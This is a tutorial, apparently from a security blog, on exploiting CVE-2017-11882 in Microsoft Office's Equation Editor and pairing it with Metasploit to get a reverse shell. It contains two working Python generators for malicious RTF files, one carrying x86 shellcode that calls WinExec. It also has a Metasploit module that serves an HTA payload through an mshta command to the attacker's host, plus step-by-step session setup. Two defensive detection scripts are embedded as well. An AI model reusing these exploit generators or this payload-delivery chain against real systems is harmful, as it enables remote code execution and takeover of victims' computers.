MSF-generated webshell: reproducing CVE-2017-11882 and combining it with MSF to get a shell on the target machine

Both scripts are pasted below, one after the other.

[Python]

import argparse
import sys

RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}

{\*\generator Riched20 6.3.9600}\viewkind4\uc1

\pard\sa200\sl276\slmult1\f0\fs22\lang9"""

RTF_TRAILER = R"""\par}

"""

OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """

OBJECT_TRAILER = R"""

}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}

{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}

{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}

{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0

\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02

00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}

"""

OBJDATA_TEMPLATE = R"""

01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1

b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001

0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe

fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000

000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000

0000000000000000000000000000000000000000000000000000001400000000000000010043006f

006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000

00000000000000000000000000000000000000000000000000000000000000010000006600000000

00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff

ffffff00000000000000000000000000000000000000000000000000000000000000000000000003

0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffff01000002080000000000000000000000000000000000000000000000000000000000000000

0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02

ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e

30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000

00000000000000000000000000000000000000000000000000000000000000000000000000030004

00000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4

ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141

414141414141414141414141414141414141414141120c4300000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000004500710075

006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000

0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000

0000000000000000000000000000000000000000000000000000000000000004000000c500000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff

ffffff00000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000000ff

ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000001050000050000000d0000004d

45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500

000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00

050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00

ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468

54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65

7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001

90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131

0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131

31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000

0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff

7cef1800040000002d01010004000000f0010000030000000000

"""

COMMAND_OFFSET = 0x949*2

def create_ole_exec_primitive(command):
    if len(command) > 43:
        print "[!] Primitive command must be shorter than 43 bytes"
        sys.exit(0)
    hex_command = command.encode("hex")
    objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
    ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER

def create_rtf(header, command, trailer):
    ole1 = create_ole_exec_primitive(command + " &")
    # We need 2 or more commands for executing remote file from WebDAV
    # because WebClient service start may take some time
    return header + ole1 + trailer

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
    parser.add_argument("-c", "--command", help="Command to execute.", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    args = parser.parse_args()
    rtf_content = create_rtf(RTF_HEADER, args.command, RTF_TRAILER)
    output_file = open(args.output, "w")
    output_file.write(rtf_content)
    output_file.close()
    print " Done ! output file --> " + args.output

Command109b_CVE-2017-11882

[Python]

# Original poc : https://github.com/embedi/CVE-2017-11882
# This version accepts a command with 109 bytes long in maximum.
# Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to acquire an arbitrary length code execution.
# But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:)

import argparse
import sys
from struct import pack

head=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}

{\*\generator Riched20 6.3.9600}\viewkind4\uc1

\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

'''

tail=r'''

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000
F0010000030000000000

}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}

{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}

{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}

{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0

\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02

00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}

\par}

'''

#0: b8 44 eb 71 12 mov eax,0x1271eb44

#5: ba 78 56 34 12 mov edx,0x12345678

#a: 31 d0 xor eax,edx

#c: 8b 08 mov ecx,DWORD PTR [eax]

#e: 8b 09 mov ecx,DWORD PTR [ecx]

#10: 8b 09 mov ecx,DWORD PTR [ecx]

#12: 66 83 c1 3c add cx,0x3c

#16: 31 db xor ebx,ebx

#18: 53 push ebx

#19: 51 push ecx

#1a: be 64 3e 72 12 mov esi,0x12723e64

#1f: 31 d6 xor esi,edx

#21: ff 16 call DWORD PTR [esi] // call WinExec

#23: 53 push ebx

#24: 66 83 ee 4c sub si,0x4c

#28: ff 10 call DWORD PTR [eax] // call ExitProcess

stage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"

# pads with nop

stage1=stage1.ljust(44,'\x90')

def genrtf(cmd):
    if len(cmd) > 109:
        print "[!] Primitive command must be shorter than 109 bytes"
        sys.exit(0)
    payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
    payload+=stage1
    payload+=pack('<I',0x00402114) # ret
    payload+='\x00'*2
    payload+=cmd
    payload=payload.ljust(197,'\x00')
    return head+payload.encode('hex')+tail

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
    parser.add_argument("-c", "--cmd", help="Command run in target system", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    args = parser.parse_args()
    with open(args.output,'wb') as f:
        f.write(genrtf(args.cmd))
    print " Done ! output file --> " + args.output
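Both generators above emit the same document shape: an `{\object\objemb\objupdate{\*\objclass Equation.3}...{\*\objdata <hex>}}` group whose hex stream starts with an OLE1 header and an OLE compound file. As an added example that is not part of the original post or of the embedi PoC, the Python 3 scanner below uses exactly that structure for detection: it pulls every objdata stream out of an RTF, parses the OLE1 header for the class name, and flags Equation.3 objects marked `\objupdate` (activated as soon as the document opens). The sample RTF it builds is constructed and carries no shellcode.

```python
import binascii
import re
import struct

CFB_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")      # OLE compound file signature, as in OBJDATA_TEMPLATE
EQNATIVE = "Equation Native".encode("utf-16-le")   # MTEF stream name stored inside the compound file
OBJDATA_RE = re.compile(r"\{\\\*\\objdata\s*([0-9a-fA-F\s]*)\}")


def parse_ole1_header(blob):
    """Return (ole_version, format, class_name) from an OLE1 object header, or None."""
    if len(blob) < 12:
        return None
    version, fmt, name_len = struct.unpack_from("<III", blob, 0)
    if name_len == 0 or name_len > 256 or len(blob) < 12 + name_len:
        return None
    class_name = blob[12:12 + name_len].rstrip(b"\x00").decode("latin-1")
    return version, fmt, class_name


def scan_rtf(text):
    """Inspect every objdata group; return one finding dict per embedded object."""
    findings = []
    for m in OBJDATA_RE.finditer(text):
        # Look back to the enclosing {\object group so we can see its control words.
        obj_start = text.rfind(r"{\object", 0, m.start())
        group = text[obj_start:m.start()] if obj_start != -1 else ""
        try:
            blob = binascii.unhexlify(re.sub(r"\s+", "", m.group(1)))
        except (binascii.Error, ValueError):
            findings.append({"class": None, "flags": ["objdata is not valid hex"], "suspicious": True})
            continue
        header = parse_ole1_header(blob)
        cls = header[2] if header else None
        flags = []
        if cls == "Equation.3":
            flags.append("Equation.3 object: handled by EQNEDT32.EXE")
        if r"\objupdate" in group:
            flags.append("objupdate: object is activated when the document opens")
        if CFB_MAGIC in blob:
            flags.append("compound file embedded in objdata")
        if EQNATIVE in blob:
            flags.append("Equation Native stream present")
        findings.append({"class": cls, "flags": flags,
                         "suspicious": cls == "Equation.3" and r"\objupdate" in group})
    return findings


def build_sample_rtf():
    """Constructed sample (not the page's exploit): an Equation.3 OLE1 object whose objdata
    holds the OLE1 header, the compound-file magic and the stream name, but no payload."""
    class_name = b"Equation.3\x00"
    native = CFB_MAGIC + b"\x00" * 24 + EQNATIVE + b"\x00" * 8
    ole1 = struct.pack("<III", 0x00000501, 2, len(class_name)) + class_name
    ole1 += struct.pack("<III", 0, 0, len(native)) + native
    return (r"{\rtf1\ansi\deff0{\object\objemb\objupdate{\*\objclass Equation.3}"
            r"\objw380\objh260{\*\objdata " + ole1.hex() + r"}}\par}")


if __name__ == "__main__":
    for finding in scan_rtf(build_sample_rtf()):
        print(finding)
```

Legitimate documents can still contain Equation.3 objects, so treat a hit as a triage signal and inspect the decoded stream rather than blocking on the class name alone.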

[Screenshots 1.png and 2.png, uploaded 2017-11-26]

You can guess what the result looks like.

Now we need an .rb module to hook this up to our MSF. The script is as follows:

[Ruby]

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Office Payload Delivery',
      'Description'    => %q{
        This module generates a command to place within
        a Word document that, when executed, will retrieve an HTA payload
        via HTTP from a web server. Currently have not figured out how
        to generate a doc.
      },
      'License'        => MSF_LICENSE,
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Automatic', {} ],
        ],
      'DefaultTarget'  => 0,
    ))
  end

  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end

First, put the script into the MSF exploit module directory on Kali; the path is

/usr/share/metasploit-framework/modules/exploits/windows/smb/

[Screenshot 3.png]

Open MSF and search for the module. Just follow my steps below.

[Screenshot 4.png]

Use the module

[Screenshot 5.png]

Set the payload to reverse TCP

[Screenshot 6.jpg]

Set the Kali host IP

[Screenshot 7.jpg]

Set the URI path; it must match what was configured when the doc was generated in step one

[Screenshot 8.jpg]

Check the current configuration

[Screenshot 8.jpg]

After the exploit is launched, msf listens on local port 8080. When the Win7 machine opens the doc, it triggers a request to 172.16.253.76:8080/abc, and we get a reverse TCP session on port 4444.
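The chain in this step (Equation Editor runs the embedded command, mshta.exe fetches the HTA from the listener) is what endpoint telemetry should catch. As an added example that is not part of the original post, here is a Python 3 check over constructed Sysmon-style process-creation events; it keys on EQNEDT32.EXE as the parent, because Equation Editor is started through DCOM by svchost.exe rather than by WINWORD.EXE, so a rule that expects Word as the parent of mshta.exe never fires for this exploit.

```python
import json
import re
from pathlib import PureWindowsPath

# Programs the page's payloads hand the second stage to: mshta for the HTA, regsvr32 for the
# .sct, plus the usual interpreters a WinExec string might name.
SECOND_STAGE = {"mshta.exe", "regsvr32.exe", "cmd.exe", "powershell.exe", "rundll32.exe"}
# http(s) URL or a WebDAV/UNC path in the command line (the first PoC runs a file from WebDAV)
REMOTE_RE = re.compile(r"(https?://\S+|\\\\[\w.-]+\\\S+)", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path, regardless of the host platform."""
    return PureWindowsPath(path).name.lower()


def classify_event(ev):
    """Score one Sysmon-style process-creation event (keys Image, ParentImage, CommandLine).
    Returns an alert dict, or None when the parent is not Equation Editor."""
    if basename(ev.get("ParentImage", "")) != "eqnedt32.exe":
        return None
    child = basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    reasons = ["EQNEDT32.EXE spawned a child process"]
    if child in SECOND_STAGE:
        reasons.append("child %s is a script host / LOLBin" % child)
    if REMOTE_RE.search(cmdline):
        reasons.append("command line references a remote resource")
    return {"severity": "high" if len(reasons) > 1 else "medium",
            "child": child, "cmdline": cmdline, "reasons": reasons}


def scan_log(lines):
    """Run classify_event over JSON-lines telemetry, skipping blank or malformed lines."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = classify_event(ev)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry (not real logs) for the chain described above; paths are
# shortened. Equation Editor's parent is the DCOM launcher (svchost.exe), not WINWORD.EXE.
SAMPLE_LOG = r"""
{"EventID": 1, "Image": "C:\\Office14\\WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "WINWORD.EXE /n exploit.doc"}
{"EventID": 1, "Image": "C:\\Common Files\\EQUATION\\EQNEDT32.EXE", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "\"EQNEDT32.EXE\" -Embedding"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Common Files\\EQUATION\\EQNEDT32.EXE", "CommandLine": "mshta.exe \"http://172.16.253.76:8080/abc\""}
not json at all
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(alert)
```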

We generate the doc file and open it

[Screenshot 9.jpg]

The reverse TCP connection comes in

[Screenshot 10.jpg]
